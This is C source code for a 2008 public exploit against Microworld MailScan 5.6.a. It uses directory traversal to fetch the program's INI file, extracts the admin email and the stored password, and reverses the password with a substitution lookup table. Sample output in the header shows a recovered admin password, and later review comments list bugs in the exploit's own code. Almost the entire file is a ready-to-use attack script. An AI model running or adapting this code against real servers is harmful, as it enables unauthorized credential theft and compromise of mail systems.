/*
----------------------------------------------------------------------------------------------
_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net
Author: SlaYeR
Date: 25. Aug. 2008
Email: [email protected]
Website: www.securitydevelopment.net
IRC: dragon.overfl0w.org #securitydevelopment.net
----------------------------------------------------------------------------------------------
Exploit based on the advisory from Oliver Karow @
http://securityvulns.com/Udocument375.html
- MailScan for Mail Servers
* Version: 5.6.a with espatch1
* Win32 Platform
Other MailScan products and versions, and builds for other platforms where
available, were not tested.
I used the directory traversal method to access the INI file of the MailScan
application to obtain some important data.
After some research I found out that the password algorithm was extremely
weak, so I decided to code an exploit for it.
15. Aug. 2008 - Advisory release
20. Aug. 2008 - SlaYeR finds out about the advisory
21. Aug. 2008 - Found out about the ini file
22. Aug. 2008 - Found out about the weak algorithm and coded a sploit for it.
25. Aug. 2008 - Private version done.
04. Sep. 2008 - Hotfix released by Microworld.
09. Sep. 2008 - Public release
Some special greets to:
Dams - He helped me with some stupid errors inside the decode_hash function
JGS - He helped me with the splitting-hash part
Mikke8 - He didn't help me but I like him ;)
Team Ph0enix - Cuz they Own
----------------------------------------------------------------------------------------------
Example:
_____ ____
/ ___/___ _____/ __ \___ _ __
\__ \/ _ \/ ___/ / / / _ \ | / /
___/ / __/ /__/ /_/ / __/ |/ /
/____/\___/\___/_____/\___/|___/
[2008] SecurityDevelopment.net
- Microworld Mailscan 5.6.a password reveal exploit -
Coded by: SlaYeR
[!] Targeting 192.168.1.111:10443
[!] Building magic string!
[!] Connected to host!
[!] Building request!
[!] Opening target!
[+] SERVER: MailScan 5.6a
[+] ADMIN: [email protected]
[+] HASH: GJBIAHALBCHIBJGJGGAEBMAFBIGGAGGKAIBJHLBMAEBJDHAPBH
[+] PASS: "sl@y3r"-owns-m!cr0word|\
[+] Done!
----------------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#pragma comment(lib, "wininet")
#pragma comment(lib,"ws2_32")
/* Banner printed once by main(). It holds no '%' characters, so passing it as
 * a printf format string (as main does) cannot consume stray arguments. */
char *SECDEV_ASCII=
" _____ ____ \n"
" / ___/___ _____/ __ \\___ _ __\n"
" \\__ \\/ _ \\/ ___/ / / / _ \\ | / /\n"
" ___/ / __/ /__/ /_/ / __/ |/ / \n"
" /____/\\___/\\___/_____/\\___/|___/ \n"
" [2008] SecurityDevelopment.net\r\n"
"\r\n"
" - Microworld Mailscan 5.6.a password reveal exploit -\r\n"
" Coded by: SlaYeR\r\n"
" \r\n\r\n";
/* Prints the plaintext character for one two-letter code of the stored
 * UserPassword= value; unknown codes print nothing. Always returns 0. */
int decode_hash(char * string);
/* Pair counter used by exploit() while splitting the stored value into
 * two-letter codes. File-scope, so it is NOT reset on entry to exploit(). */
int Count;
/* Requests MAILSCAN.INI from url:port over WinInet, parses a few keys from
 * the first read and prints them. Returns 0 on every path. */
int exploit(char *url,char *port);
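int main(int argc, char *argv[])
{
    /* Entry point: prints the banner, validates the argument count, then runs
     * exploit() with argv[1] as the host and argv[2] as the port.
     *
     * The original read argv[1] and argv[2] before checking argc; with a
     * single argument argv[2] lies past the end of argv. The check now comes
     * first. The banner is data rather than a literal, so it is written with
     * fputs() instead of being used as a printf format string.
     *
     * @return 0 always (exploit()'s result is not propagated).
     */
    fputs(SECDEV_ASCII, stdout);
    if (argc <= 2) {
        printf(" Usage: %s <IP> <PORT>\n", argc > 0 ? argv[0] : "");
        return 0;
    }
    exploit(argv[1], argv[2]);
    return 0;
}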
int exploit(char *url,char *port)
{
// Requests MAILSCAN.INI through a path-traversal URL over WinInet, pulls four
// keys out of the first read and decodes UserPassword= pair by pair via
// decode_hash(). url and port arrive straight from argv. Returns 0 on every
// path, so the caller cannot distinguish success from failure.
printf("[!] Targeting %s:%s\n",url,port);
HINTERNET httpopen, openurl;
// Raw response bytes. Nothing NUL-terminates this buffer before the strstr()
// calls below, so they may read past its end.
char buffer2[1024];
DWORD read;
char *check;
char *string1 = "http://";
char *string2 = "/../../../../PROGRA~1/MailScan/MAILSCAN.INI";
// Request URL. url and port are appended with memcpy and no length check,
// so oversized argv values overrun this 1025-byte buffer.
char bigbuffer[1025];
// sscanf("%s") targets: UserPassword, AdminEmailId, ProductName, Version.
// %s is unbounded, so a value longer than 1024 bytes overruns them; a buffer
// whose sscanf does not match is left uninitialised and is still printed.
char buffer3[1025];
char buffer4[1025];
char buffer5[1025];
char buffer6[1025];
// Assignment inside the condition is intentional: httpopen is the new session.
if(httpopen = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0))
{
printf("[!] Building request!\n");
memset(bigbuffer,0,1025);
memcpy(bigbuffer,string1,strlen(string1));
memcpy(bigbuffer+strlen(bigbuffer),url,strlen(url));
memcpy(bigbuffer+strlen(bigbuffer),":",strlen(":"));
memcpy(bigbuffer+strlen(bigbuffer),port,strlen(port));
memcpy(bigbuffer+strlen(bigbuffer),string2,strlen(string2));
}
else
{
printf("[-] Error building request!\n");
// httpopen is NULL on this path, so closing it does nothing.
InternetCloseHandle(httpopen);
// NOTE(review): buffer2 is a char array, not a HANDLE; this call is invalid
// (the same misuse appears at the other two CloseHandle sites below).
CloseHandle(buffer2);
return 0;
}
printf("[!] Trying to connect @ %s:%s\n",url,port);
// Assignment inside the condition is intentional: openurl is the request handle.
if(openurl = InternetOpenUrl(httpopen, bigbuffer, NULL, NULL,
INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, NULL))
{
printf("[!] Connected to host!\n");
}
else
{
printf("[-] Error while connecting! \n");
InternetCloseHandle(httpopen);
// openurl is NULL here; closing it does nothing.
InternetCloseHandle(openurl);
CloseHandle(buffer2);
return 0;
}
// A single read of at most sizeof(buffer2) bytes: anything beyond the first
// 1024 bytes of the file is never seen, and `read` is not used to terminate
// the buffer afterwards.
if(InternetReadFile(openurl, buffer2, sizeof(buffer2), &read))
{
if(check = strstr(buffer2, "[General]"))
{
// Each strstr() result goes straight into sscanf with no NULL check, so a
// missing key dereferences NULL. `check` is reused for every lookup, which
// means the check==NULL test below only reflects the final Version= lookup
// (or the [General] lookup when that one already failed).
check = strstr(buffer2, "UserPassword=");
sscanf(check, "UserPassword=%s ", buffer3);
check = strstr(buffer2, "AdminEmailId=");
sscanf(check, "AdminEmailId=%s ", buffer4);
check = strstr(buffer2, "ProductName=");
sscanf(check, "ProductName=%s ", buffer5);
check = strstr(buffer2, "Version=");
sscanf(check, "Version=%s ", buffer6);
}
if( check==NULL )
{
printf("[-] Server not vuln :(\n");
}
else
{
printf("[+] SERVER: %s %s\n",buffer5,buffer6);
printf("[+] ADMIN: %s\n",buffer4);
printf("[+] HASH: %s\n",buffer3);
printf("[+] PASS: ");
// bufferfiller collects one two-letter code at a time; sized like buffer3
// (1025), which matches the memset(…,1025) below.
char bufferfiller[sizeof(buffer3)];
char temp[1025];
memset(bufferfiller,0,sizeof(buffer3));
// int i against size_t strlen(): signed/unsigned comparison.
for (int i=0;i < strlen(buffer3); i++)
{
// Count is file-scope and is not reset on entry. An odd trailing character
// is never decoded and leaves Count at 1 for any later call.
Count++;
sprintf(temp,"%c",buffer3[i]);
memcpy(bufferfiller+strlen(bufferfiller),temp,strlen(temp));
if(Count == 2)
{
char buf[255];
// sizeof(255) is sizeof(int), not 255; only the first 4 bytes are zeroed.
// Harmless here only because sprintf NUL-terminates buf.
memset(buf,0,sizeof(255));
sprintf(buf,"%s",bufferfiller);
// Prints the plaintext character for this two-letter code.
decode_hash(buf);
memset(bufferfiller,0,1025);
Count = 0;
}
}
printf("\n[+] Done!\n");
}
}
else
{
printf("[-] Server not vuln :(\n");
}
InternetCloseHandle(httpopen);
InternetCloseHandle(openurl);
// NOTE(review): see above — buffer2 is not a HANDLE.
CloseHandle(buffer2);
return 0;
}
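int decode_hash(char * string)
{
    /* Maps one two-letter code of the stored UserPassword= value to the
     * plaintext character it stands for and writes that character to stdout.
     * The stored form is a fixed per-character substitution — every plaintext
     * character is always the same two letters — which is why a lookup table
     * reverses it. Only the default charset is covered.
     *
     * @param string  NUL-terminated two-letter code (e.g. "AK"). NULL or an
     *                unknown code prints nothing.
     * @return        always 0.
     *
     * The table keeps the original if-chain order and does not stop at the
     * first match: "BH" is listed twice ('|' then '\\'), exactly as in the
     * original, so that code prints both characters. '%' is emitted with
     * putchar(); the original used printf("%"), an incomplete conversion
     * specification, which is undefined behaviour.
     */
    static const struct {
        const char *code;
        char ch;
    } table[] = {
        {"DA", '{'}, {"DG", '}'}, {"BH", '|'}, {"HB", ':'},
        {"GJ", '"'}, {"HH", '<'}, {"HF", '>'}, {"HE", '?'},
        {"BA", '['}, {"BG", ']'}, {"BH", '\\'}, {"HA", ';'},
        {"GM", '\''}, {"GH", ','}, {"GF", '.'}, {"GE", '/'},
        {"DF", '~'}, {"GK", '!'}, {"AL", '@'}, {"GI", '#'},
        {"GP", '$'}, {"GO", '%'}, {"BF", '^'}, {"GN", '&'},
        {"GB", '*'}, {"GD", '('}, {"BE", '_'}, {"GA", '+'},
        {"GG", '-'}, {"HG", '='},
        {"AK", 'a'}, {"AJ", 'b'}, {"AI", 'c'}, {"AP", 'd'},
        {"AO", 'e'}, {"AN", 'f'}, {"AM", 'g'}, {"AD", 'h'},
        {"AC", 'i'}, {"AB", 'j'}, {"AA", 'k'}, {"AH", 'l'},
        {"AG", 'm'}, {"AF", 'n'}, {"AE", 'o'}, {"BL", 'p'},
        {"BK", 'q'}, {"BJ", 'r'}, {"BI", 's'}, {"BP", 't'},
        {"BO", 'u'}, {"BN", 'v'}, {"BM", 'w'}, {"BD", 'x'},
        {"BC", 'y'}, {"BB", 'z'},
        {"HK", '1'}, {"HJ", '2'}, {"HI", '3'}, {"HP", '4'},
        {"HO", '5'}, {"HN", '6'}, {"HM", '7'}, {"HD", '8'},
        {"HC", '9'}, {"HL", '0'},
        {"GC", ')'}, {"GL", ' '},
    };

    if (string == NULL) {
        return 0;
    }
    /* No break on match: duplicate codes print every mapping, in table order. */
    for (size_t i = 0; i < sizeof table / sizeof table[0]; i++) {
        if (strcmp(string, table[i].code) == 0) {
            putchar(table[i].ch);
        }
    }
    return 0;
}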